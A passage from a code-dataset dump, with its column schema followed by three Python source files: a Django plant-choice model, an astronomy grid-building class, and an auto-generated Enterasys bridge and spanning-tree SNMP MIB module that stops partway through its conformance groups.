blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
eef3b93d6d17e25958c2f4cdb7df664e8e4c68d9
|
7943eb0fc792750bcffee961d544bf013f150de3
|
/src/plantChoices/models.py
|
ffdbb26f6d6e52069fdc6a137324b1ca60c64d09
|
[] |
no_license
|
ZayX0/gardenbuilder-backend
|
633377ebd1606901ce5bdd222972925be17c652f
|
e2bd5b50461c8ec15d3faa4d92fb17858426e40e
|
refs/heads/master
| 2022-12-24T23:06:34.204147
| 2020-10-05T22:28:16
| 2020-10-05T22:28:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 804
|
py
|
from django.db import models
from django.utils.timezone import now
from sections.models import Section
class PlantChoice(models.Model):
genus = models.CharField(max_length=100, blank=False)
genus_common_name = models.CharField(max_length=100, blank=False)
species = models.CharField(max_length=100, blank=False)
species_common_name = models.CharField(max_length=100, blank=False)
square_footage = models.DecimalField(
default=0.25, max_digits=3, decimal_places=2)
square_footage_sfg = models.DecimalField(
default=0.25, max_digits=3, decimal_places=2
)
additional_information = models.CharField(max_length=100)
def __str__(self):
return self.genus_common_name
class Meta:
unique_together = ("species", "additional_information")
|
[
"dthompson@tcadcentral.org"
] |
dthompson@tcadcentral.org
|
43b7696094bbd9a3218ecfa280404f8e7564d839
|
47fb4e962cf4a2fc85721faea0e7a764f4e443dc
|
/astrogrid/grid.py
|
2859e12b56510f8b5a310469f52c9cc053ef4800
|
[
"MIT"
] |
permissive
|
jesaerys/astrogrid
|
d068e5b626dc3f7065d7bbbee3af98952891cfde
|
a6f7f92058c3b935d7274e97f8633f0b962b7ce8
|
refs/heads/master
| 2016-09-05T16:28:22.372053
| 2014-09-18T18:49:05
| 2014-09-18T18:49:05
| 20,024,189
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,455
|
py
|
"""
================
`astrogrid.grid`
================
Create 2d grids from flattened data.
This module defines the `Grid` class, which takes an unstructured set of
data, performs a user-defined calculation on it, and arranges the results
as a grid of the desired shape. The resulting grid is a 2d ndarray, so it
can easily be processed further, plotted, or written to an image file.
Classes
-------
====== =================================
`Grid` Build a grid from flattened data.
====== =================================
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
class Grid(object):
"""Build a grid from flattened data.
A grid is defined by a shape, a function, and list of arguments for the
grid cells. The grid itself is represented by a 2d ndarray of the given
shape (the `data` attribute), where the value of each cell is computed
using the function and the cell's arguments. Grid attributes can be
modified freely. The grid's data array is only updated when the
`update` method is called.
Parameters
----------
shape : tuple
Initialize the `shape` attribute.
func : function
Initialize the `func` attribute.
args : list
Initialize the `args` attribute.
kwargs : list, optional
Initialize the `kwargs` attribute. Default is a list of empty
dictionaries equal in length to `args`.
fill : int or float, optional
Initialize the `fill` attribute. Default is `np.nan`.
update : bool, optional
If True, the grid values are calculated on instantiation. If False
(default), then the entire grid is set to `fill` until the `update`
method is called.
Attributes
----------
shape
Numbers of rows and columns in the grid.
nrow
ncol
ij
xy
edges
func
Function that calculates the value of each cell in the grid.
args
List of tuples, one per cell, containing the arguments for `func`.
The tuples are ordered as a list of cells from a flattened grid
(e.g., `numpy.ravel`). The list is automatically exteneded with
Nones if it is too short for the given grid shape, or truncated if
it is too long.
kwargs
Similar to `args`, but a list of dictionaries containing any
keyword arguments for `func`.
fill : int or float
Fallback value to assign a cell if its args or kwargs is None.
data_list
data_grid
Methods
-------
update
"""
def __init__(self, shape, func, args, kwargs=None, fill=np.nan,
update=False):
self.shape = shape
self.func = func
self.args = args
self.kwargs = [{} for a in args] if kwargs is None else kwargs
self.fill = fill
self._data_list = np.zeros(shape).ravel() * fill
self._data_grid = self._data_list.reshape(shape)
if update:
self.update()
return
@property
def nrow(self):
"""Number of rows in the grid."""
return self.shape[0]
@property
def ncol(self):
"""Number of columns in the grid."""
return self.shape[1]
@property
def ij(self):
"""Row and column array coordinates (row and column indices) of the
cells in the grid.
"""
return np.indices(self.shape)
@property
def xy(self):
"""x and y pixel coordinates of the centers of the cells in the grid.
The pixel coordinate system places the center of the cell in the
first row and first column (i,j = 0,0) at x,y = 1,1; the cell's
outer corner is at x,y = 0.5,0.5.
"""
return np.indices(self.shape)[::-1] + 1
@property
def edges(self):
"""x and y pixel coordinates of the edges of the cells in the grid.
See `xy` for the definition of the pixel coordinate system.
"""
return np.indices((self.nrow+1, self.ncol+1))[::-1] + 0.5
@property
def data_list(self):
"""Grid cell values as a flattened array.
The order of the cells is the same as `args` and `kwargs`. If a
cell's argument tuple or keyword dictionary are set to None, then
the cell's value is set to `fill`.
This is a read-only attribue because the value in a given cell is
the result of evaluating a function with a set of arguments.
Setting a cell's value directly would break this link.
"""
return self._data_list
@property
def data_grid(self):
"""Grid cell values as a 2d array.
This is a reshaped view of `data_list`.
"""
return self._data_grid
def _check_list(self, list_):
"""Fill or trim the list to the proper length."""
n = self.nrow * self.ncol
len_list = len(list_)
if len_list < n:
list_ = list_ + [None]*(n - len_list)
elif n < len_list:
list_ = list_[:n]
return list_
def _check_data(self, arr):
"""Fill or trim the array to the proper length."""
n = self.nrow * self.ncol
len_arr = arr.size
if len_arr < n:
arr = np.append(arr, [self.fill]*(n - len_arr))
elif n < len_arr:
arr = arr.copy()[:n]
else:
arr = arr.copy()
return arr
def _wrap_func(self):
"""Wrap self.func so that it returns self.fill when provided with
None.
"""
def wrapper(args, kwargs):
if args is None or kwargs is None:
val = self.fill
else:
val = self.func(*args, **kwargs)
return val
return wrapper
def _apply_func(self, where=None):
"""Update the values in the data array at the given indices.
See `update` for the `where` keyword.
"""
func = self._wrap_func()
if hasattr(where, 'dtype') and where.dtype == bool:
where = np.where(where) # get indices from boolean array
if where is None:
i_list = xrange(self.nrow*self.ncol)
elif len(where) == 2 and hasattr(where[0], '__len__'):
# get flat indices from row,col indices
i_list = np.ravel_multi_index(where, self.shape)
else:
i_list = where
for i in i_list:
self._data_list[i] = func(self.args[i], self.kwargs[i])
return
def update(self, where=None):
"""Update the grid to the values of the current attributes.
The grid data array is always copied before updating, thus breaking
any references to `data_list` and `data_grid`.
Parameters
----------
where : list, optional
A list of indices specifying which cells to update, as either a
list of indices for the flattened grid or a list containing a
list of row indices followed by a list of column indices. All
cells are updated if None (default).
Returns
-------
None
"""
self.args = self._check_list(self.args)
self.kwargs = self._check_list(self.kwargs)
self._data_list = self._check_data(self._data_list)
self._apply_func(where=where)
self._data_grid = self._data_list.reshape(self.shape)
return
|
[
"jacob.simones@gmail.com"
] |
jacob.simones@gmail.com
|
85934a1752f5ac64318bcca6e3543510617b2dfb
|
85a9ffeccb64f6159adbd164ff98edf4ac315e33
|
/pysnmp/ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB.py
|
373236694ab14c69e20100207467dd0e3afbd94d
|
[
"Apache-2.0"
] |
permissive
|
agustinhenze/mibs.snmplabs.com
|
5d7d5d4da84424c5f5a1ed2752f5043ae00019fb
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
refs/heads/master
| 2020-12-26T12:41:41.132395
| 2019-08-16T15:51:41
| 2019-08-16T15:53:57
| 237,512,469
| 0
| 0
|
Apache-2.0
| 2020-01-31T20:41:36
| 2020-01-31T20:41:35
| null |
UTF-8
|
Python
| false
| false
| 26,359
|
py
|
#
# PySNMP MIB module ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 18:49:14 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueRangeConstraint")
dot1dBasePort, dot1dStpDesignatedRoot, dot1dBasePortEntry, dot1dStpPortEntry, dot1dStpPort, dot1dBasePortIfIndex, dot1dBaseBridgeAddress = mibBuilder.importSymbols("BRIDGE-MIB", "dot1dBasePort", "dot1dStpDesignatedRoot", "dot1dBasePortEntry", "dot1dStpPortEntry", "dot1dStpPort", "dot1dBasePortIfIndex", "dot1dBaseBridgeAddress")
etsysModules, = mibBuilder.importSymbols("ENTERASYS-MIB-NAMES", "etsysModules")
EnabledStatus, = mibBuilder.importSymbols("P-BRIDGE-MIB", "EnabledStatus")
dot1qTpFdbPort, = mibBuilder.importSymbols("Q-BRIDGE-MIB", "dot1qTpFdbPort")
NotificationGroup, ModuleCompliance, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance", "ObjectGroup")
Integer32, NotificationType, Gauge32, Bits, Counter32, MibIdentifier, TimeTicks, iso, ObjectIdentity, Unsigned32, IpAddress, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "NotificationType", "Gauge32", "Bits", "Counter32", "MibIdentifier", "TimeTicks", "iso", "ObjectIdentity", "Unsigned32", "IpAddress", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity")
TextualConvention, DisplayString, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString", "TruthValue")
etsysIetfBridgeMibExtMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31))
etsysIetfBridgeMibExtMIB.setRevisions(('2007-07-31 18:19', '2007-03-21 21:02', '2006-11-09 16:37', '2006-10-04 19:51', '2004-11-04 14:47', '2004-05-28 15:08', '2004-04-08 20:04', '2004-03-04 19:39', '2004-03-01 22:29', '2003-11-14 18:31', '2003-06-19 19:36', '2002-12-13 21:20',))
if mibBuilder.loadTexts: etsysIetfBridgeMibExtMIB.setLastUpdated('200707311819Z')
if mibBuilder.loadTexts: etsysIetfBridgeMibExtMIB.setOrganization('Enterasys Networks, Inc')
etsysIetfBridgeMibExt = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1))
etsysIetfBridgeDot1dStp = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1))
etsysIetfBridgeDot1dBase = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 2))
etsysIetfBridgeDot1qBase = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 3))
etsysIetfBridgeDot1dSpanGuard = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 4))
etsysIetfBridgeDot1dBackupRoot = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 5))
etsysIetfBridgeDot1dLoopProtect = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6))
etsysIetfBridgeDot1Notifications = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 0))
etsysIetfBridgeDot1dStpPortTable = MibTable((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 1), )
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpPortTable.setStatus('current')
etsysIetfBridgeDot1dStpPortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 1, 1), )
dot1dStpPortEntry.registerAugmentions(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpPortEntry"))
etsysIetfBridgeDot1dStpPortEntry.setIndexNames(*dot1dStpPortEntry.getIndexNames())
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpPortEntry.setStatus('current')
etsysIetfBridgeDot1dStpPortStpEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 1, 1, 1), EnabledStatus().clone('enabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpPortStpEnable.setStatus('current')
etsysIetfBridgeDot1dStpPortSpanGuardBlocking = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 1, 1, 2), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpPortSpanGuardBlocking.setStatus('current')
etsysIetfBridgeDot1dStpPortCistRoleValue = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("disabled", 1), ("root", 2), ("designated", 3), ("alternate", 4), ("backUp", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpPortCistRoleValue.setStatus('current')
etsysIetfBridgeDot1dStpPortCistNonForwardingReason = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("none", 1), ("disputed", 2), ("spanGuardLocked", 3), ("loopProtectEvent", 4), ("loopProtectAdvisory", 5), ("loopbackDetected", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpPortCistNonForwardingReason.setStatus('current')
etsysIetfBridgeDot1dStpTopChangeTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2), ("edgePortDisabled", 3))).clone('enabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpTopChangeTrapEnable.setStatus('current')
etsysIetfBridgeDot1dStpNewRootTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 3), EnabledStatus().clone('enabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpNewRootTrapEnable.setStatus('current')
etsysIetfBridgeDot1dStpBridgePriorityDefault = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("stp8021d1998", 1), ("stp8021t2001", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpBridgePriorityDefault.setStatus('current')
etsysIetfBridgeDot1dStpSpanGuardEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 4, 1), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpSpanGuardEnable.setStatus('current')
etsysIetfBridgeDot1dStpSpanGuardTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 4, 2), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpSpanGuardTrapEnable.setStatus('current')
etsysIetfBridgeDot1dStpSpanGuardBlockTime = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 4, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(1, 65535), ))).setUnits('seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpSpanGuardBlockTime.setStatus('current')
etsysIetfBridgeDot1dStpBackupRootEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 5, 1), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpBackupRootEnable.setStatus('current')
etsysIetfBridgeDot1dStpBackupRootTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 5, 2), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpBackupRootTrapEnable.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectPortTable = MibTable((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 1), )
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectPortTable.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectPortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 1, 1), )
dot1dStpPortEntry.registerAugmentions(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectPortEntry"))
etsysIetfBridgeDot1dStpLoopProtectPortEntry.setIndexNames(*dot1dStpPortEntry.getIndexNames())
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectPortEntry.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectPortCistEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 1, 1, 1), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectPortCistEnable.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectPortCistBlocking = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 1, 1, 2), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectPortCistBlocking.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectPortPartnerCapable = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 1, 1, 3), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectPortPartnerCapable.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectEventThreshold = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 2), Unsigned32().clone(3)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectEventThreshold.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectEventWindow = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 3), Unsigned32().clone(180)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectEventWindow.setStatus('current')
etsysIetfBridgeDot1dStpLoopProtectEventTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 6, 4), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dStpLoopProtectEventTrapEnable.setStatus('current')
etsysIetfBridgeDot1dBasePortTable = MibTable((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 2, 1), )
if mibBuilder.loadTexts: etsysIetfBridgeDot1dBasePortTable.setStatus('current')
etsysIetfBridgeDot1dBasePortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 2, 1, 1), )
dot1dBasePortEntry.registerAugmentions(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dBasePortEntry"))
etsysIetfBridgeDot1dBasePortEntry.setIndexNames(*dot1dBasePortEntry.getIndexNames())
if mibBuilder.loadTexts: etsysIetfBridgeDot1dBasePortEntry.setStatus('current')
etsysIetfBridgeDot1dBasePortNewLearnedAddrTrap = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 2, 1, 1, 1), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dBasePortNewLearnedAddrTrap.setStatus('current')
etsysIetfBridgeDot1dBasePortMovedAddrTrap = MibTableColumn((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 2, 1, 1, 2), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1dBasePortMovedAddrTrap.setStatus('current')
etsysIetfBridgeDot1qNewLearnedAddrTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 3, 1), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1qNewLearnedAddrTrapEnable.setStatus('current')
etsysIetfBridgeDot1qMovedAddrTrapEnable = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 3, 2), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1qMovedAddrTrapEnable.setStatus('current')
etsysIetfBridgeDot1qStaticUcastAsMcast = MibScalar((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 3, 3), EnabledStatus().clone('disabled')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: etsysIetfBridgeDot1qStaticUcastAsMcast.setStatus('current')
etsysIetfBridgeDot1qFdbNewLearnedAddr = NotificationType((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 0, 1)).setObjects(("Q-BRIDGE-MIB", "dot1qTpFdbPort"))
if mibBuilder.loadTexts: etsysIetfBridgeDot1qFdbNewLearnedAddr.setStatus('current')
etsysIetfBridgeDot1dSpanGuardPortBlocked = NotificationType((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 0, 2)).setObjects(("BRIDGE-MIB", "dot1dBasePort"), ("BRIDGE-MIB", "dot1dBasePortIfIndex"))
if mibBuilder.loadTexts: etsysIetfBridgeDot1dSpanGuardPortBlocked.setStatus('current')
etsysIetfBridgeDot1dBackupRootActivation = NotificationType((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 0, 3)).setObjects(("BRIDGE-MIB", "dot1dBaseBridgeAddress"), ("BRIDGE-MIB", "dot1dStpDesignatedRoot"))
if mibBuilder.loadTexts: etsysIetfBridgeDot1dBackupRootActivation.setStatus('current')
etsysIetfBridgeDot1qFdbMovedAddr = NotificationType((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 0, 4)).setObjects(("Q-BRIDGE-MIB", "dot1qTpFdbPort"))
if mibBuilder.loadTexts: etsysIetfBridgeDot1qFdbMovedAddr.setStatus('current')
etsysIetfBridgeDot1dCistLoopProtectEvent = NotificationType((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 1, 0, 5)).setObjects(("BRIDGE-MIB", "dot1dStpPort"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectPortCistBlocking"))
if mibBuilder.loadTexts: etsysIetfBridgeDot1dCistLoopProtectEvent.setStatus('current')
etsysIetfBridgeConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2))
etsysIetfBridgeGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1))
etsysIetfBridgeCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 2))
etsysIetfBridgeStpPort = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 1)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpPortStpEnable"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeStpPort = etsysIetfBridgeStpPort.setStatus('current')
etsysIetfBridgeStpTrap = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 2)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpTopChangeTrapEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpNewRootTrapEnable"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeStpTrap = etsysIetfBridgeStpTrap.setStatus('current')
etsysIetfBridgeBase = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 3)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qNewLearnedAddrTrapEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dBasePortNewLearnedAddrTrap"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeBase = etsysIetfBridgeBase.setStatus('current')
etsysIetfBridgeDot1qFdbNewAddrNotification = NotificationGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 4)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qFdbNewLearnedAddr"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeDot1qFdbNewAddrNotification = etsysIetfBridgeDot1qFdbNewAddrNotification.setStatus('current')
etsysIetfBridgeDot1dStpBridgePriority = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 5)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpBridgePriorityDefault"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeDot1dStpBridgePriority = etsysIetfBridgeDot1dStpBridgePriority.setStatus('current')
etsysIetfBridgeSpanGuard = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 6)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpSpanGuardEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpSpanGuardBlockTime"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpSpanGuardTrapEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpPortSpanGuardBlocking"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeSpanGuard = etsysIetfBridgeSpanGuard.setStatus('current')
etsysIetfBridgeSpanGuardNotification = NotificationGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 7)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dSpanGuardPortBlocked"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeSpanGuardNotification = etsysIetfBridgeSpanGuardNotification.setStatus('current')
etsysIetfBridgeBackupRoot = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 8)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpBackupRootEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpBackupRootTrapEnable"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeBackupRoot = etsysIetfBridgeBackupRoot.setStatus('current')
etsysIetfBridgeBackupRootNotification = NotificationGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 9)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dBackupRootActivation"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeBackupRootNotification = etsysIetfBridgeBackupRootNotification.setStatus('current')
etsysIetfBridgePortCistRoleValue = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 10)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpPortCistRoleValue"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgePortCistRoleValue = etsysIetfBridgePortCistRoleValue.setStatus('current')
